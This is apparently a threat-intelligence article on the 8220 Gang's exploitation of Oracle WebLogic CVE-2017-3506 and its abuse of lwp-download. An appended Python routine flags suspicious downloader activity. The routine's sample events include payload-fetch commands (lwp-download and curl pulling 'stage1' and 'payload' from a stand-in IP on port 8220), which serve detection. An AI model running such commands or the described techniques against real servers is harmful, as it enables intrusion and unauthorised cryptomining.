

Despite reusing old tools and C&C servers, the gang has started targeting Windows systems, and using new file and C&C servers to evade previous detections.


8220 Gang (also known as “8220 Mining Group,” a name derived from their use of port 8220 for command-and-control, or C&C, communications) has been active since 2017 and continues to scan for vulnerable applications in cloud and container environments. Researchers have documented this group targeting Oracle WebLogic, Apache Log4j, and Atlassian Confluence vulnerabilities, as well as misconfigured Docker containers, to deploy cryptocurrency miners on both Linux and Microsoft Windows hosts. The group was documented to have used Tsunami malware, the XMRIG cryptominer, masscan, and spirit, among other tools, in their campaigns. Looking at other researchers’ documentation of the gang’s recent activities, the threat actor appears to have remained active in recent months.

This article explores a recent attack, captured by one of our honeypots, that exploited the Oracle WebLogic vulnerability CVE-2017-3506. This vulnerability, with a CVSS score of 7.4, impacts the WLS Security Component of Oracle WebLogic; when exploited, it can enable attackers to remotely execute arbitrary commands through an HTTP request carrying a specifically crafted XML document. This allows attackers to gain unauthorised access to sensitive data or compromise the entire system.

Lwp-download is a Linux utility present by default on a number of platforms, and 8220 Gang making it part of a malware routine can affect a number of services, even when that routine is reused more than once. Abuse of lwp-download might be expected in the short term for compromise and targeting of other platforms. Considering the threat actor’s tendency to reuse tools across different campaigns and to abuse legitimate tools as part of its arsenal, organizations’ security teams might be challenged to find other detection and blocking solutions to fend off attacks that abuse this utility.
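As an added illustration of the detection problem described above (example code written for this page, not the article's or the group's tooling), the routine below triages process-execution events and flags lwp-download invocations that were spawned by the application-server process or that fetch from a bare IP, a non-allowlisted host, or port 8220. The tab-separated event format, the allowlist and the sample events are constructed assumptions, not data from the article.

```python
import ipaddress
import shlex
from urllib.parse import urlparse

# Constructed sample telemetry: "<parent_comm>\t<comm>\t<cmdline>" per line.
# Real data would come from auditd execve records or EDR process events.
SAMPLE_EVENTS = """\
bash\tlwp-download\tlwp-download https://mirrors.example.internal/repo/pkg.tar.gz /tmp/pkg.tar.gz
java\tlwp-download\tlwp-download http://198.51.100.23:8220/stage1 /tmp/.x
cron\tcurl\tcurl -s http://198.51.100.23/payload -o /tmp/p
java\tsh\tsh -c 'lwp-download http://updates.example.net/tool /var/tmp/tool'
"""

ALLOWED_HOSTS = {"mirrors.example.internal", "repo.example.internal"}  # constructed allowlist
SERVER_PARENTS = {"java"}  # the WebLogic JVM should never spawn a downloader


def parse_event(line):
    parent, comm, cmdline = line.rstrip("\n").split("\t", 2)
    return {"parent": parent, "comm": comm, "argv": shlex.split(cmdline)}


def flatten(argv):
    """Expand 'sh -c "<script>"' style wrappers so the inner command is visible."""
    out = []
    for tok in argv:
        out.extend(shlex.split(tok) if " " in tok else [tok])
    return out


def find_lwp_download(argv):
    """Return argv from the lwp-download token onward, or None if absent."""
    for i, tok in enumerate(argv):
        if tok.rsplit("/", 1)[-1] == "lwp-download":
            return argv[i:]
    return None


def url_reasons(url):
    reasons, u = [], urlparse(url)
    host = u.hostname or ""
    try:
        ipaddress.ip_address(host)
        reasons.append("bare IP download source")
    except ValueError:
        if host not in ALLOWED_HOSTS:
            reasons.append("host not in allowlist")
    if u.port == 8220:  # port historically tied to this group's C&C, per the article
        reasons.append("port 8220")
    return reasons


def triage(events_text):
    findings = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        lwp = find_lwp_download(flatten(ev["argv"]))
        if lwp is None:
            continue
        reasons = []
        if ev["parent"] in SERVER_PARENTS:
            reasons.append(f"spawned by application-server process {ev['parent']}")
        url = next((a for a in lwp[1:] if "://" in a), None)
        if url:
            reasons.extend(url_reasons(url))
        if reasons:
            findings.append({"cmdline": " ".join(lwp), "url": url, "reasons": reasons})
    return findings
```

Only the two events whose downloader is launched by the JVM or points outside the allowlist are returned; the benign package fetch from the internal mirror is left alone.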
